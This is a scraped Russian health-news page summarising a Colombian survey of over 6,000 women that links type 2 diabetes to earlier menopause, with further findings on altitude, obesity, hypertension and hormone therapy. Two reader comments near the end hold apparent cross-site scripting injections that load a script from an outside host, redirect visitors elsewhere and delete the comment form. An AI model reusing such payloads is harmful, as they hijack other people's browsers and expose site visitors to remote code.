Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Где вы живете – ответит н...  >>  Где вы живете – ответит на вопрос, когда у вас будет диабет! Где же надо жить?
 
Обратная связь
 

Где вы живете – ответит на вопрос, когда у вас будет диабет! Где же надо жить?

Размер шрифта
15 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Колумбийские ученые пришли к выводу, что сахарный диабет 2 типа (самый распространенный вариант этого заболевания) утраивает вероятность раннего наступления климакса.

Где вы живете – ответит на вопрос, когда у вас будет диабет! Где же надо жить?

Сахарный диабет был и остается значительной проблемой современной медицины в международных масштабах. Статистика утверждает, что более 350 миллионов людей по всему миру болеют диабетом. На секундочку, эта цифра превышает население России более, чем в два раза. Эксперты предсказывают рост числа пациентов до 552 миллионов к 2030 году, при этом у 90% из них будет диабет именно 2 типа.

Коллектив ученых из университета Картахены (Колумбия) во главе с доктором Альваро Монтерроса-Кастро решили провести исследование, целью которого стал поиск взаимосвязи между диабетом и климаксом. Авторы опросили более 6 000 женщин в возрасте 40-59 лет из одиннадцати латиноамериканских стран. Вопросы касались различных аспектов здоровья женщин, в первую очередь менопаузы, депрессии и сахарного диабета. Затем ученые соотнесли полученные ответы с объективными количественными показателями, такими как: масса тела, артериальное давление, частота пульса и другие. Используя статистическую программу, разработанную американским Центром по контролю и профилактике заболений (CDC US), авторы обнаружили серию корреляционных связей – некоторые из них были вполне ожидаемы, в то время как другие стали для исследователей настоящим сюрпризом.

Основные выводы, к которым пришли колумбийские ученые:

  • Менопауза сама по себе не повышает риск развития сахарного диабета. Но наоборот, наличие диабета у женщины моложе 45 лет почти в три раза повышает вероятность наступления раннего климакса; средний возраст менопаузы у женщин с диабетом составил 48,5 лет, тогда как при отсутствии этого заболевания месячные прекращались существенно позднее – в 50,1 лет.
  • Жизнь в условиях высокогорья (более 2 500 метров выше уровня моря) ассоциирована со сниженным риском развития диабета (на 26%).
  • У женщин с индексом массы тела более 30 (что укаывает на ожирение) риск развития диабета повышен на 57%.
  • Артериальная гипертония повышает риск развития дибета на 87%.

Один из самых неоднозначных выводов, к которым пришли ученые из Колумбии: гормонозаместительная терапия повышает риск развития диабета на 14%. «Этот результат разительно отличается от данных, полученных в ряде исследований прошлого. Ранее было показано, что гормонозаместительная терапия, напротив, снижает риск развития сахарного диабета», – рассказывает доктор Монтерроса-Кастро. «Впрочем, не исключено, что эти различия обусловлены генетическими факторами или тем, что сегодня женщины принимают меньшие дозы гормональных препаратов, чем раньше».

В целом, работа колумбийских ученых лишний раз подтверждает то, что диабет и менопауза – феномены взаимосвязанные, и связь между ними носит сложный и малоизученный характер. Одно ясно наверняка: к женщинами перед менопаузой лечащие врачи должны относиться с особо пристальным вниманием, обязательно учитывая все имеющиеся факторы риска, как внешние, так и внутренние.

О том, как сохранить и преумножить женское здоровье, читайте на страницах нашего одноименного специального проекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:52

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Боретесь с климаксом – не ослепнете!   Как не сойти с ума после климакса   Если баланс гормонов нарушен   Как пережить климакс и остаться женщиной  
27 мая 2013Почему женщины толстеют после 45? Как этого избежать? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Как обмануть время и выглядеть молодой после 45?
Что нельзя запивать алкоголем?
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.